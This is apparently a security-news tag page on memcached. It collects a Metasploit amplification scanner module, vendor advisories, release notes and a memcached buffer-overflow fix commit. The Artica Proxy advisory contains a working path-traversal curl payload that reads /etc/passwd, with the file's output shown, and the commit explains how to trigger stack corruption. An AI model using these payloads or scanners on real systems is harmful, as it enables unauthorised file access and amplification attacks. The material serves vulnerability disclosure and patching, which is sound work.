This Metasploit module can be used to discover Memcached servers which expose the unrestricted UDP port 11211. A basic "stats" request is executed to check if an amplification attack is possible against a third party.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Auxiliary::Report  include Msf::Exploit::Capture  include Msf::Auxiliary::UDPScanner  include Msf::Auxiliary::DRDoS  def initialize    super(      'Name'        => 'Memcached Stats Amplification Scanner',      'Description' => %q(          This module can be used to discover Memcached servers which expose the          unrestricted UDP port 11211. A basic "stats" request is executed to check          if an amplification attack is possible against a third party.      ),      'Author'      =>        [          'Marek Majkowski', # Cloudflare blog and base payload          'xistence <xistence[at]0x90.nl>', # Metasploit scanner module          'Jon Hart <jon_hart@rapid7.com>', # Metasploit scanner module        ],      'License'     => MSF_LICENSE,      'DisclosureDate' => 'Feb 27 2018',      'References'  =>          [            ['URL', 'https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/'],            ['CVE', '2018-1000115']          ]    )    register_options([      Opt::RPORT(11211)    ])  end  def build_probe    # Memcached stats probe, per https://github.com/memcached/memcached/blob/master/doc/protocol.txt    @memcached_probe ||= [      rand(2**16), # random request ID      0, # sequence number      1, # number of datagrams in this sequence      0, # reserved; must be 0      "stats\r\n"    ].pack("nnnna*")  end  def scanner_process(data, shost, sport)    # Check the response data for a "STAT" response    if data =~ /\x0d\x0aSTAT\x20/      @results[shost] ||= []      @results[shost] << data    end  end  # Called after the scan block  def scanner_postscan(batch)    @results.keys.each do |host|      response_map = { @memcached_probe => @results[host] }      report_service(        host: host,        proto: 'udp',        port: rport,        name: 'memcached'      )      peer = "#{host}:#{rport}"      vulnerable, proof = prove_amplification(response_map)      what = 'memcached stats amplification'      if vulnerable        print_good("#{peer} - Vulnerable to #{what}: #{proof}")        report_vuln(          host: host,          port: rport,          proto: 'udp',          name: what,          refs: references        )      else        vprint_status("#{peer} - Not vulnerable to #{what}: #{proof}")      end    end  endend

Memcached Stats Amplification Scanner

Gentoo Linux Security Advisory 202405-3 - A vulnerability has been discovered in Dalli, which can lead to code injection. Versions greater than or equal to 3.2.3 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202405-03  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Dalli: Code Injection  
     Date: May 04, 2024  
     Bugs: #882077  
       ID: 202405-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in Dalli, which can lead to code  
injection.

Background  
==========

Dalli is a high performance pure Ruby client for accessing memcached  
servers.

Affected packages  
=================

Package         Vulnerable    Unaffected  
--------------  ------------  ------------  
dev-ruby/dalli  < 3.2.3       >= 3.2.3

Description  
===========

A vulnerability was found in Dalli. Affected is the function  
self.meta_set of the file lib/dalli/protocol/meta/request_formatter.rb  
of the component Meta Protocol Handler. The manipulation leads to  
injection.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Dalli users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-ruby/dalli-3.2.3"

References  
==========

[ 1 ] CVE-2022-4064  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4064

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202405-03

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202405-03

Artica Proxy versions 4.40 and 4.50 suffer from a local file inclusion protection bypass vulnerability that allows for path traversal.

    KL-001-2024-001: Artica Proxy Unauthenticated LFI Protection Bypass VulnerabilityTitle: Artica Proxy Unauthenticated LFI Protection Bypass VulnerabilityAdvisory ID: KL-001-2024-001Publication Date: 2024.03.05Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-001.txt1. Vulnerability Details      Affected Vendor: Artica      Affected Product: Artica Proxy      Affected Version: 4.40 and 4.50      Platform: Debian 10 LTS      CWE Classification: CWE-23: Relative Path Traversal      CVE ID: CVE-2024-20532. Vulnerability Description      The Artica Proxy administrative web application attempts to      prevent local file inclusion. These protections can be bypassed      and arbitrary file requests supplied by unauthenticated      users will be returned according to the privileges of the      "www-data" user.3. Technical Description      Prior to authentication, a user can send an HTTP request to      the "images.listener.php" endpoint. This endpoint processes      the "mailattach" query parameter and concatonates the user      supplied value to the "/opt/artica/share/www/attachments/"      file path. The contents of the file located at the newly      created path is returned in the HTTP response body.      The "images.listener.php" endpoint attempts to prevent      a local file inclusion vulnerability by stripping strings      that attempt to traverse into the parent directory from      the user supplied "mailattach" value:$_GET["mailattach"]=str_replace("////","/",$_GET["mailattach"]);$_GET["mailattach"]=str_replace("///","/",$_GET["mailattach"]);$_GET["mailattach"]=str_replace("//","/",$_GET["mailattach"]);$_GET["mailattach"]=str_replace("../","",$_GET["mailattach"]);$_GET["mailattach"]=str_replace("/etc/","",$_GET["mailattach"]);$_GET["mailattach"]=str_replace("passwd","",$_GET["mailattach"]);$file="/opt/artica/share/www/attachments/{$_GET["mailattach"]}";        header("Content-type: application/force-download" );        header("Content-Disposition: attachment; \                filename=\"{$_GET["mailattach"]}\"");        header("Content-Length: ".filesize($file)."" );        header("Expires: 0" );        readfile($file);      If effective, this approach would limit files      accessible by this endpoint to those within the      "/opt/artica/share/www/attachments/" directory. Unfortunately,      the removal of the "../" string is only performed once, so      the resulting file path is not checked.  By using the path      "..././foo.txt", the "images.listener.php" endpoint removes the      "../" string resulting in "../foo.txt" - a relative file path      to traverse to the parent directory.      The strings "/etc/" and "passwd" are also stripped from the file      path as many methods of detecting a path traversal vulnerability      rely on fetching the "/etc/passwd" file. By inserting these      strings into specific locations, a user suppplied "mailattach"      value such as "/epasswdtc/ppasswdasswd" is transformed into      "/etc/passwd", bypassing the protection entirely.      An unauthenticated user can leverage this endpoint to read      files on the system, according to the privileges of the      "www-data" user.4. Mitigation and Remediation Recommendation      No response from vendor; no remediation available.5. Credit      This vulnerability was discovered by Jaggar Henry of KoreLogic,      Inc.6. Disclosure Timeline      2023.12.18 - KoreLogic requests vulnerability contact and                   secure communication method from Artica.      2023.12.18 - Artica Support issues automated ticket #1703011342                   promising follow-up from a human.      2024.01.10 - KoreLogic again requests vulnerability contact and                   secure communication method from Artica.      2024.01.10 - KoreLogic mail daemon receives SMTP 554 5.7.1 from                   mail.articatech.com with response                   "Client host rejected: Go Away!"      2024.01.11 - KoreLogic requests vulnerability contact and                   secure communication method via                   https://www.articatech.com/ 'Contact Us' web form.      2024.01.23 - KoreLogic requests CVE from MITRE.      2024.01.23 - MITRE issues automated ticket #1591692 promising                   follow-up from a human.      2024.02.01 - 30 business days have elapsed since KoreLogic                   attempted to contact the vendor.      2024.02.06 - KoreLogic requests update on CVE from MITRE.      2024.02.15 - KoreLogic requests update on CVE from MITRE.      2024.02.22 - KoreLogic reaches out to alternate CNA for                   CVE identifiers.      2024.02.26 - 45 business days have elapsed since KoreLogic                   attempted to contact the vendor.      2024.02.29 - Vulnerability details presented to AHA!                   (takeonme.org) by proxy.      2024.03.01 - AHA! issues CVE-2024-2053 to track this                   vulnerability.      2024.03.05 - KoreLogic public disclosure.7. Proof of Concept      $ curl -k 'https://192.168.2.129:9000/images.listener.php?uri=1&mailattach=..././..././..././..././..././epasswdtc/ppasswdasswd'      root:x:0:0:root:/root:/bin/bash      daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin      bin:x:2:2:bin:/bin:/usr/sbin/nologin      sys:x:3:3:sys:/dev:/usr/sbin/nologin      sync:x:4:65534:sync:/bin:/bin/sync      games:x:5:60:games:/usr/games:/usr/sbin/nologin      man:x:6:12:man:/var/cache/man:/usr/sbin/nologin      lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin      mail:x:8:8:mail:/var/mail:/usr/sbin/nologin      news:x:9:9:news:/var/spool/news:/usr/sbin/nologin      uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin      proxy:x:13:13:proxy:/bin:/usr/sbin/nologin      www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin      backup:x:34:34:backup:/var/backups:/usr/sbin/nologin      list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin      irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin      gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin      nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin      _apt:x:100:65534::/nonexistent:/usr/sbin/nologin      systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin      systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin      systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin      messagebus:x:104:110::/nonexistent:/usr/sbin/nologin      mysql:x:105:112:MySQL Server,,,:/nonexistent:/bin/false      quagga:x:106:114:Quagga routing suite,,,:/run/quagga/:/usr/sbin/nologin      apt-mirror:x:107:115::/var/spool/apt-mirror:/bin/sh      privoxy:x:108:65534::/etc/privoxy:/usr/sbin/nologin      ntp:x:109:117::/nonexistent:/usr/sbin/nologin      redsocks:x:110:118::/var/run/redsocks:/usr/sbin/nologin      prads:x:111:120::/home/prads:/usr/sbin/nologin      freerad:x:112:121::/etc/freeradius:/usr/sbin/nologin      vnstat:x:113:122:vnstat daemon,,,:/var/lib/vnstat:/usr/sbin/nologin      stunnel4:x:114:123::/var/run/stunnel4:/usr/sbin/nologin      sshd:x:115:65534::/run/sshd:/usr/sbin/nologin      vde2-net:x:116:124::/var/run/vde2:/usr/sbin/nologin      memcache:x:117:125:Memcached,,,:/nonexistent:/bin/false      davfs2:x:118:126::/var/cache/davfs2:/usr/sbin/nologin      ziproxy:x:119:127::/var/run/ziproxy:/usr/sbin/nologin      proftpd:x:120:65534::/run/proftpd:/usr/sbin/nologin      ftp:x:121:65534::/srv/ftp:/usr/sbin/nologin      mosquitto:x:122:128::/var/lib/mosquitto:/usr/sbin/nologin      openldap:x:123:129:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false      munin:x:124:130:munin application user,,,:/var/lib/munin:/usr/sbin/nologin      msmtp:x:125:131::/var/lib/msmtp:/usr/sbin/nologin      Debian-snmp:x:126:132::/var/lib/snmp:/bin/false      opendkim:x:127:133::/var/run/opendkim:/usr/sbin/nologin      avahi:x:128:134:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin      glances:x:129:135::/var/lib/glances:/usr/sbin/nologinArticaStats:x:1000:1000:ArticaStats:/home/ArticaStats:/bin/bash      Debian-exim:x:130:138::/var/spool/exim4:/usr/sbin/nologin      smokeping:x:131:139:SmokePing daemon,,,:/var/lib/smokeping:/usr/sbin/nologin      debian-spamd:x:132:140::/var/lib/spamassassin:/bin/sh      netdata:x:1001:1002:netdata:/home/netdata:/bin/bash      postfix:x:1002:1001::/home/postfix:/bin/sh      ...      ...The contents of this advisory are copyright(c) 2024KoreLogic, Inc. and are licensed under a Creative CommonsAttribution Share-Alike 4.0 (United States) License:http://creativecommons.org/licenses/by-sa/4.0/KoreLogic, Inc. is a founder-owned and operated company with aproven track record of providing security services to entitiesranging from Fortune 500 to small and mid-sized companies. Weare a highly skilled team of senior security consultants doingby-hand security assessments for the most important networks inthe U.S. and around the world. We are also developers of varioustools and resources aimed at helping the security community.https://www.korelogic.com/about-korelogic.htmlOur public vulnerability disclosure policy is available at:https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt

Artica Proxy 4.40 / 4.50 Local File Inclusion / Traversal

A critical flaw has been identified in elijaa/phpmemcachedadmin affecting version 1.3.0, specifically related to a stored XSS vulnerability. This vulnerability allows malicious actors to insert a carefully crafted JavaScript payload. The issue arises from improper encoding of user-controlled entries in the "/pmcadmin/configure.php" parameter.

**PHPMemcachedAdmin vulnerable to cross-site scripting (XSS) via improper encoding**

Moderate severity GitHub Reviewed Published Nov 30, 2023 to the GitHub Advisory Database • Updated Dec 6, 2023

GHSA-pr4w-m4rp-gp87: PHPMemcachedAdmin vulnerable to cross-site scripting (XSS) via improper encoding

A Path traversal vulnerability has been reported in elijaa/phpmemcachedadmin affecting version 1.3.0. This vulnerability allows an attacker to delete files stored on the server due to lack of proper verification of user-supplied input.

**PHPMemcachedAdmin Path Traversal vulnerability**

Critical severity GitHub Reviewed Published Nov 30, 2023 to the GitHub Advisory Database • Updated Dec 6, 2023

GHSA-8qfm-h8rh-h3r7: PHPMemcachedAdmin Path Traversal vulnerability

Affected Resources

*   PHPMemcachedAdmin 1.3.0 version

Description

INCIBE has coordinated the publication of 3 vulnerabilities that affect PHPMemcachedAdmin, a stand-alone graphical management program for memcached for monitoring and debugging purposes, which have been discovered by Rafael Pedrero.

A estas vulnerabilidades se les han asignado los siguientes códigos, puntuación base CVSS v3.1, vector del CVSS y el tipo de vulnerabilidad CWE de cada vulnerabilidad:

*   CVE-2023-6026: CVSS v3.1: 9.8 | CVSS: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | CWE-22.
*   CVE-2023-6027: CVSS v3.1: 6.1 | CVSS: AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | CWE-79.

Solution

There is no reported solution at this time.

Detail

*   **CVE-2023-6026**: a Path traversal vulnerability has been reported in elijaa/phpmemcachedadmin affecting version 1.3.0. This vulnerability allows an attacker to delete files stored on the server due to lack of proper verification of user-supplied input.
*   **CVE-2023-6027**: a critical flaw has been identified in elijaa/phpmemcachedadmin affecting version 1.3.0, specifically related to a stored XSS vulnerability. This vulnerability allows malicious actors to insert a carefully crafted JavaScript payload. The issue arises from improper encoding of user-controlled entries in the "/pmcadmin/configure.php" parameter.

CVE-2023-6026: Multiple vulnerabilities in PHPMemcachedAdmin

Netflix, Spotify, Twitter, PayPal, Slack. All down for millions of people. How a group of teen friends plunged into an underworld of cybercrime and broke the internet—then went to work for the FBI.

The Mirai Confessions: Three Young Hackers Who Built a Web-Killing Monster Finally Tell Their Story

Ubuntu Security Notice 6476-1 - It was discovered that Memcached incorrectly handled certain multiget requests in proxy mode. A remote attacker could use this issue to cause Memcached to crash, resulting in a denial of service, or possibly execute arbitrary code. It was discovered that Memcached incorrectly handled certain proxy requests in proxy mode. A remote attacker could use this issue to cause Memcached to crash, resulting in a denial of service, or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6476-1November 13, 2023memcached vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.10- Ubuntu 23.04- Ubuntu 22.04 LTSSummary:Several security issues were fixed in memcached.Software Description:- memcached: High-performance in-memory object caching systemDetails:It was discovered that Memcached incorrectly handled certain multigetrequests in proxy mode. A remote attacker could use this issue to causeMemcached to crash, resulting in a denial of service, or possibly executearbitrary code. (CVE-2023-46852)It was discovered that Memcached incorrectly handled certain proxy requestsin proxy mode. A remote attacker could use this issue to cause Memcached tocrash, resulting in a denial of service, or possibly execute arbitrarycode. (CVE-2023-46853)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.10:   memcached                       1.6.21-1ubuntu0.23.10.1Ubuntu 23.04:   memcached                       1.6.18-1ubuntu0.1Ubuntu 22.04 LTS:   memcached                       1.6.14-1ubuntu0.1In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6476-1   CVE-2023-46852, CVE-2023-46853Package Information:   https://launchpad.net/ubuntu/+source/memcached/1.6.21-1ubuntu0.23.10.1   https://launchpad.net/ubuntu/+source/memcached/1.6.18-1ubuntu0.1   https://launchpad.net/ubuntu/+source/memcached/1.6.14-1ubuntu0.1

Ubuntu Security Notice USN-6476-1

Couchbase Server 7.1.4 before 7.1.5 and 7.2.0 before 7.2.1 allows Directory Traversal.

Couchbase Server 7.2.1 was released in September 2023.

**New Features**

This release includes the following new features.

**XDCR**

The following XDCR features are new:

*   XDCR replications, specified by means of the REST API, can now use the filterBinary flag. This specifies whether binary documents should be replicated. Detailed information on the filterBinary flag is provided on the REST reference page, Creating a Replication.
    
*   Using the REST API, node-connectivity can now be checked, prior to the creation of an XDCR reference. See Checking Connections.
    
*   In Couchbase Server Version 7.2.1 and later, XDCR provides enhanced information on cluster-rebalance status. See Rebalance Information
    

**Enhancements**

This release includes the following enhancements:

*   Bloom filters for the Indexing Service were not previously enabled by default. Bloom filters are now enabled by default. This change reduces the Index Service disk lookups when there are insert heavy workloads. Bloom filters are used by the index storage layer to reduce the disk i/o and improve the overall efficiency of the index service. You can disable bloom filters and opt out.
    

**Future Reserved Words**

To give you enough time to prepare ahead, we are going to add the following reserved words for features in an upcoming Couchbase Server release:

*   SEQUENCE
    
*   CACHE
    
*   RESTART
    
*   MAXVALUE
    
*   MINVALUE
    
*   NEXT
    
*   PREV
    
*   PREVIOUS
    
*   NEXTVAL
    
*   PREVVAL
    
*   CYCLE
    
*   RECURSIVE
    
*   RESTRICT
    

No action is required for upgrading to Server 7.2.1.

**New Supported Platforms**

This release adds support for the following new platforms:

*   Alma Linux 9
    
*   Rocky Linux 9
    

**Fixed Issues**

This release contains the following fixes.

**Analytics Service**

  

Issue

Description

Resolution

MB-56957

External collections could not be created using Azure Managed Identity.

Azure dependencies have been updated to correct this issue.

MB-57588

Query results could be unnecessarily converted twice to JSON when documents were large.

The Query result is now converted to JSON once for all documents.

MB-57615

When the Prometheus stats returned from Analytics exceeded four kilobytes, the status code was inadvertently set to 500 (Internal Error), and this resulted in a large number of warnings in the Analytics warning log. Couchbase Server discarded these statistics.

This has been fixed to properly return a 200 (OK) status code when the size of Prometheus stats exceeds 4KiB, allowing these stats to be recorded properly. The warning is not displayed.

**Data Service**

  

Issue

Description

Resolution

MB-39344

The last item in a replica checkpoint was not expelled. In scenarios such as large average item size, high numbers of replicas or low Bucket quota could result in a data-node entering an unrecoverable Out-of-Memory state.

ItemExpel has been enhanced to release all the items in a checkpoint when memory conditions allow.

MB-56084

A rollback loop affected legacy clients when collections were used and a tombstone newer than the last mutation in the default collection was purged.

The lastReadSeqno is now Incremented when the client is not collection-aware.

MB-56644

In rare cases, after a failover or memcached restart, a replica rollback while under memory pressure might have caused a crash in the Data Service.

Memory pressure recovery logic (Item expelling) is now skipped when replica rollback is in progress.

MB-56970

XDCR or restore from backup entered an endless loop if attempting to overwrite a document which was deleted or expired some time ago with a deleteWithMeta operation. This was due to a specific unanticipated state in memory which increased CPU usage, and connection became unusable for further operations.

deleteWithMeta is now resilient to temporary non-existent values with xattr datatype.

MB-57002

When using .NET SDK on Windows 10 client and client certs were enabled on CB Server, the Data-Service did not establish a connection and client bootstrap failed with a OpenSSL “session id context uninitialized" error.

Data-Service has been updated to disable TLS session resume.

MB-57064

GET\_META requests for deleted items fetched metadata in memory which was not evicted in value-eviction buckets.

Metadata items are now cleaned when the expiry pager runs.

MB-57106

DCP clients streamed in out-of-sequence-order \[OSO\] backfill snapshots under Magma observed duplicate documents received in the disk snapshot. This happened where the stream was paused and resumed when the resume point was wrongly set to a key already processed in the stream.

OSO backfill in Magma now sets the correct resume point after a pause.

MB-57304

Data Service rebalance duration was significantly impacted if other DCP clients created a large number of Streams, if those streams needed to be read from disk, due to the lack of prioritizing between rebalance and other DCP clients.

The number of backfills each DCP client can perform concurrently has been limited to allow fairer allocation of resources.

MB-57400

The computation count for the items remaining DCP/Checkpoint stats exposed to Prometheus was the O(N) function. Where N is the number of items in a checkpoint. This caused various performance issues including Prometheus stats timeouts when checkpoints accumulated a high number of items.

The computation count has been optimized and now is O(1).

MB-57609

A spurious auto-failover could happen when Magma compaction visited a TTL’d document that was already deleted.

Document not found does not now increment the number of read failures.

**Index Service**

  

Issue

Description

Resolution

MB-56339

During scaling, an GSI indexer rebalance froze and did not successfully complete. This was because an index snapshot was not correctly deleted and recreated.

A flag now handles snapshots to ensure they are correctly deleted or recreated when indexes are updated during rebalancing.

MB-57021

When alter index updated the replica count, new replicas were not built immediately when the original definition was {defer\_build: true}. Existing replicas were built and new replicas were built in the next processing iteration.

New replicas are now built when the replica count is updated for deferred indexes. The status of existing index instances is checked, and if ready, a new build of the instance is triggered.

MB-57777

When the indexer was unable to keep up with KV mutations, and there was a queue of mutations within the indexer, there was a large memory overhead from the bookkeeping of queued up mutations.

Indexer has been improved to optimize memory usage so that the bookkeeping overhead is reduced for queued up mutations.

**Query Service**

  

Issue

Description

Resolution

MB-56533

Due to how nested dependencies were handled, a sudden rise in memory utilization of the query service on a node caused a memory alert issue. The node did not recover correctly following a restart.

Nested dependencies are now handled appropriately in the ADVISE statement.

MB-56563

A query with multiple filters on an index key, one of which was a parameter, could produce incorrect results. This was caused by incorrectly composing the exact index spans to support the query.

The way in which exact spans are set has been modified to correct this issue.

MB-56579

Covering FLATTEN\_KEYS() on an array index generated incorrect results. This was because a modified version of the ANY clause was applied after the index which meant false positives were retained and Distinct scan rows were eliminated.

The ANY filter is now applied on an index scan itself when covering an index scan with flatten keys.

MB-56683

Inter-service read timeout errors were not detected or handled accordingly. User requests consequently failed with timeout errors without retrying with a new connection.

The error handling and retry mechanism has been modified to handle these types of timeout issues and errors.

MB-56727

Under certain circumstances, a query with UNNEST used a covering index scan and incorrect results were returned. Reference to the UNNEST expression should have prevented the covering index from being used for the query as the index did not contain the entire array.

The logic to determine covering UNNEST scans has been changed to not use a covering index scan for such queries.

MB-56937

When an index scan had multiple spans, index selectivity was incorrectly calculated.

Index selectivity for multiple index spans is now correctly calculated.

MB-57024

Incorrect results were returned for a non-IndexScan on a constant false condition. This was due to incorrect handling of a FALSE WHERE clause.

The FALSE WHERE clause is now correctly handled.

MB-57029

Querying system:functions\_cache in a multi query node cluster returned incomplete results with warnings. The query result included entries in the local query node, but none from remote query nodes. This was due to a typographical error.

The typographical error has been corrected.

MB-57080

A panic in go\_json.stateInString under parsed value functions caused by incorrect concurrent access resulted in the state being freed whilst still in use.

The concurrent access issue has been resolved.

MB-57251

A Prepared statement might have resulted in an incorrect result in a multi-node environment. For example, a database with two query nodes.

Correlated subqueries from an encoded plan are now detected and marked. This ensures correct results are provided.

MB-57279

When a WITH clause (common table expression, or CTE) was used inside a subquery, and the WITH clause definition referenced the parent query, and was correlated, the query engine did not properly detect the correlation. This produced an incorrect result from the WITH clause evaluation because the result was not cached correctly.

Correlations inside WITH clause definitions are now properly detected.

MB-57316

cbq required a client authentication key file whenever a certificate authority file was used.

cbq now accepts a certificate authority file without a client key file enabling use with username and password credentials.

MB-57680

When appropriate optimizer statistics were used in Cost-Based Optimizer (CBO), for a query with ORDER BY, if there were multiple indexes available for the query, CBO unconditionally favored an index that provided ordering. Such indexes were not always the best ones to use.

CBO now allows cost-based comparison of indexes.

MB-57838

An ADVISE statement with multiple levels of UNNEST caused a syntax error in the CREATE INDEX statement from the Index Advisor.

ADVISE has been improved when there are queries with multiple levels of UNNEST.

**Cluster Manager**

  

Issue

Description

Resolution

MB-57484

A Cluster Manager process crash meant the Delete Bucket memcached command was not always called before bucket files were deleted later in rebalance. This caused the memcached process to crash repeatedly causing data service downtime.

The Delete Bucket command is now called on memcached before a file is deleted during rebalance. This ensures mencached doesn’t attempt to read the files.

**Cross Datacenter Replication (XDCR)**

  

Issue

Description

Resolution

MB-56601

Data streamed from the Data Service over XDCR should always be streamed in order by mutation id. However, in some scenarios, for efficiency, the Data Service streamed records that were not ordered by mutation id. In certain situations, this out-of-sequence-order \[OSO\] caused performance issues.

OSO mode is now available as a global override to be switched off for any currently deployed replications to avoid performance issues.

MB-56711

XDCR did not process documents with a JSON array and Extended Attributes (XATTRs). When a document contained XATTRs, XDCR checked for XATTRs in transactions, transaction filters were enabled, and XATTRs were not checked.

When documents contain arrays, XATTRs are now checked in the transaction XATTRs, and the document is not prevented from being parsed in an array.

MB-56741

Binary documents were replicated when an Advanced Filtering Expression was present.

A filter has been added which can be turned on to prevent all binary documents from being replicated.

MB-56773

It appeared that XDCR had stalled and an explanation was not provided. For rebalances on the source or target, the XDCR pipeline should be restarted, and data movement should continue. Before the pipeline was restated, there might have been fewer data movements as the rebalanced VBs were no longer streaming.

An ETA is now provided in the Server UI to show when the pipeline is due to be restarted.

MB-56799

Checkpoint Manager created checkpoint records out-of-sequence when many target nodes ran slowly.

Checkpoint Manager now creates checkpoints in sequence when target nodes are slow.

MB-56848

The bucket topology service sent a concurrent map iteration and map write panic to XDCR which caused a fatal error.

Validation has been improved to prevent the panic from happening.

MB-56938

Prometheus stats did not include a pipeline’s status.

The pipeline status is now provided as part of a prometheus stat.

MB-57130

A Checkpoint Manager Initialization error caused two memory leak types. These were a backfill pipeline and a main pipeline memory leak.

The Pipeline Manager and backfill pipeline have both been modified to prevent the memory leaks.

MB-57183

XDCR Checkpoint Manager instances were not cleaned up under certain circumstances due to timing and networking issues when contacting target, or when an invalid backfill task was fed in as input.

Checkpoint Manager instances are now cleaned up. A flag has been added to check for invalid backfill tasks.

MB-57234

When a replication spec change was made to a non-Data Service node, delete replication hung and caused the node to return an incorrect replication configuration.

XDCR now checks that the node is running the Data Service and handles it correctly.

MB-57277

XDCR could fail due to multiple connection issues. For example, DNS issues or firewalls. For a number of databases, it was a difficult task to manually check every node to determine where the connection issue was. For multiple nodes in a database and in the target database, debugging the issue required many connection checks.

A connection pre-check feature has been added to XDCR which ensures all connections from source nodes to target nodes are valid. Credentials are now also checked.

MB-57412

Running ipv6 only mode + non-encrypted remote resulted in invalid IP addresses being returned, leading to connection issues.

A valid IP address is now returned.

MB-57462

StatsMgr stopping could hang due to watching for notifications resulting in stranded go-routines.

Go-routines are now stopped correctly.

MB-57562

When ipv4 only mode was used, and full encryption only had an alternate address configured where the internal address was unresolvable, XDCR resulted in an error when it contacted the target data nodes.

The specific scenario has been fixed so that replication can now proceed.

MB-57743

The Prometheus endpoint did not expose any XDCR error metrics.

XDCR error metrics are now exposed via Prometheus.

MB-57787

A legacy race condition where metadata store could cause a conflict was exposed as part of the binary filter improvements.

Legacy race conditions have all been resolved.

MB-58203

Under certain circumstances, when rebalancing, the target cluster could return an EACCESS error code that caused source XDCR to pause the pipeline.

This has been reversed. Instead of pausing the pipeline when rebalancing, XDCR now retries when an EACCESS error is encountered in XmemNozzle. XDCR counts and prints this activity in the log.

MB-58545

Checkpoint Manager could be stuck when stopping if it had not been started yet, resulting in memory leak.

Checkpoint Manager can now be stopped correctly even when it hasn’t been started.

**Metrics and Monitoring**

  

Issue

Description

Resolution

MB-56464

An issue occurred where the Cluster Manager instructed Prometheus to reload the configuration and the reload timeout impacted other requests.

The Cluster Manager has been improved to handle timeouts when instructing Prometheus to reload the configuration.

MB-56517

The Cluster Manager’s computed utilization stats were inaccurate due to time interval discrepancies in components where data was collected.

The Cluster Manager now reports raw stats as Prometheus counters.

**Storage**

  

Issue

Description

Resolution

MB-57157

Inconsistencies were observed where a single Magma bucket in a database took a long time to warm up.

The seq index scan has been optimized for tombstones of zero value size. Optimization is for look up by key, sequence iteration, and key iteration. Docs of 0 value size are placed in both key index and seq index.

MB-57714

Disk backfills were hanging permanently due to high memory consumption when large documents were streamed over many DCP streams concurrently.

Memory for a document read by a DCP stream is now released before switching to another stream.

**Known Issues**

**Search Service**

  

Issue

Description

Workaround

MB-58450

An issue occurs with node failover. If a user does not bring in a replacement node before the failover occurs, then lost active or lost replica search indexes that have partitions on the replaced node are not rebuilt.  
As a result, search requests return partial/incomplete results. In addition,existing indexes with defined replica(s) become vulnerable to another node failure.

This issue is only pertinent to the **7.2.1** release, and does not affect older builds.

This situation can be prevented if a replacement node was brought into the cluster in place of the failed over node, before starting the rebalance operation. This problem should not affect on-line or off-line rebalances.

If lost indexes are encountered, then, a manual update to the affected search index definition(s) will trigger a rebuild of the affected indexes.  
(The advice here is to toggle the replica count so that unaffected index partitions are re-used, and only the lost partitions are rebuilt.)

CVE-2023-36667: Release Notes for Couchbase Server 7.2

In Memcached before 1.6.22, a buffer overflow exists when processing multiget requests in proxy mode, if there are many spaces after the "get" substring.

**Commit**

Permalink

Browse files

Browse the repository at this point in the history

proxy: fix buffer overflow with multiget syntax

"get\[200 spaces\]key1 key2\\r\\n" would overflow a temporary buffer used to
process multiget syntax.

To exploit this you must first pass the check in try\_read\_command\_proxy:
- The request before the first newline must be less than 1024 bytes.
- If it is more than 1024 bytes there is a limit of 100 spaces.
- The key length is still checked at 250 bytes
- Meaning you have up to 772 spaces and then the key to create stack
  corruption.

So the amount of data you can shove in here isn't unlimited.

The fix caps the amount of data pre-key to be reasonable. Something like
GAT needs space for a 32bit TTL which is at most going to be 15 bytes +
spaces, so we limit it to 20 bytes.

I hate hate hate hate hate the multiget syntax. hate it.

*   Loading branch information

Tag

#memcached